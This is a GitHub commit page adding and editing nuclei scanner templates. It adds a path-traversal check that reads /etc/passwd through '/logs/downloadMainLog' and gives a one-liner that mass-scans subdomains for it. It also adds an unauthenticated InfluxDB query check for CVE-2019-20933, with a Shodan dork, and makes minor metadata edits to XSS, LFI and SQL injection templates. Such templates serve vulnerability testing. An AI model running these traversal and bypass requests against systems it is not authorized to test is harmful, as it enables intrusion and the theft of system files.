Skip to content

Commit 93dbf28

Browse files
committed
add 3 PoCs 2022-08-23
1 parent 22b17f0 commit 93dbf28

37 files changed

+272
-12
lines changed
Lines changed: 25 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
id: logs-passwd
2+
info:
3+
name: logs-passwd
4+
severity: high
5+
author:
6+
- 51pwn
7+
description: |-
8+
cat rootDomains.txt | assetfinder -subs-only | httpx -silent -nc -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8808 -path "/logs/downloadMainLog?fname=../../../../../../..//etc/passwd" -mr "root:x:" -t 60
9+
10+
requests:
11+
- raw:
12+
- |
13+
GET /logs/downloadMainLog?fname=../../../../../../..//etc/passwd HTTP/1.1
14+
Host: {{Hostname}}
15+
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
16+
17+
18+
matchers:
19+
- type: word
20+
part: body
21+
words:
22+
- 'root:x:'
23+
24+
redirects: false
25+

config/nuclei-templates/cves/2018/CVE-2018-19749.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
id: CVE-2018-19749
2+
23
info:
34
name: DomainMOD 4.11.01 - Cross-Site Scripting
45
author: arafatansari

config/nuclei-templates/cves/2019/CVE-2019-18665.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
id: CVE-2019-18665
2+
23
info:
34
name: DOMOS 5.5 - Local File Inclusion
45
author: 0x_Akoko
Lines changed: 39 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,39 @@
1+
id: CVE-2019-20933
2+
3+
info:
4+
name: Authentication Bypass InfluxDB
5+
author: pussycat0x,c-sh0
6+
severity: critical
7+
description: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
8+
reference:
9+
- https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
10+
- https://nvd.nist.gov/vuln/detail/CVE-2019-20933
11+
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933
12+
- https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6
13+
remediation: Update Influxdb to version 1.6.7~rc0-1 or higher.
14+
classification:
15+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16+
cvss-score: 9.8
17+
cve-id: CVE-2019-20933
18+
cwe-id: CWE-287
19+
metadata:
20+
shodan-dork: InfluxDB
21+
verified: "true"
22+
tags: unauth,db,influxdb,misconfig
23+
requests:
24+
- method: GET
25+
path:
26+
- "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
27+
28+
matchers-condition: and
29+
matchers:
30+
- type: word
31+
part: body
32+
words:
33+
- '"results":'
34+
- '"name":"databases"'
35+
condition: and
36+
37+
- type: status
38+
status:
39+
- 200

config/nuclei-templates/cves/2020/CVE-2020-20988.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
id: CVE-2020-20988
2+
23
info:
34
name: DomainMOD 4.13.0 - Cross-Site Scripting
45
author: arafatansari

config/nuclei-templates/cves/2021/CVE-2021-24910.yaml

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -4,13 +4,15 @@ info:
44
name: Transposh WordPress < 1.0.7 - Reflected Cross-Site Scripting (XSS)
55
author: Screamy
66
severity: medium
7+
description: |
8+
The Transposh WordPress Translation WordPress plugin before 1.0.8 does not sanitise and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue
79
reference:
810
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
911
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt
1012
- https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17
1113
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24910
1214
metadata:
13-
verified: true
15+
verified: "true"
1416
tags: cve,cve2021,wordpress,wp-plugin,xss,wp
1517

1618
requests:

config/nuclei-templates/cves/2021/CVE-2021-37589.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
id: CVE-2021-37589
2+
23
info:
34
name: Virtua Software Cobranca <12R - Blind SQL Injection
45
author: princechaddha

config/nuclei-templates/cves/2021/CVE-2021-41569.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
id: CVE-2021-41569
2+
23
info:
34
name: SAS/Internet 9.4 1520 - Local File Inclusion
45
author: 0x_Akoko

config/nuclei-templates/cves/2022/CVE-2022-0540.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@ info:
1010
- https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
1111
- https://nvd.nist.gov/vuln/detail/CVE-2022-0540
1212
- https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
13+
remediation: Ensure you are using the latest version and that all security patches have been applied.
1314
classification:
1415
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1516
cvss-score: 9.8

config/nuclei-templates/cves/2022/CVE-2022-0594.yaml

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1,4 +1,5 @@
11
id: CVE-2022-0594
2+
23
info:
34
name: Shareaholic < 9.7.6 - Information Disclosure
45
author: atomiczsec

0 commit comments

Comments
 (0)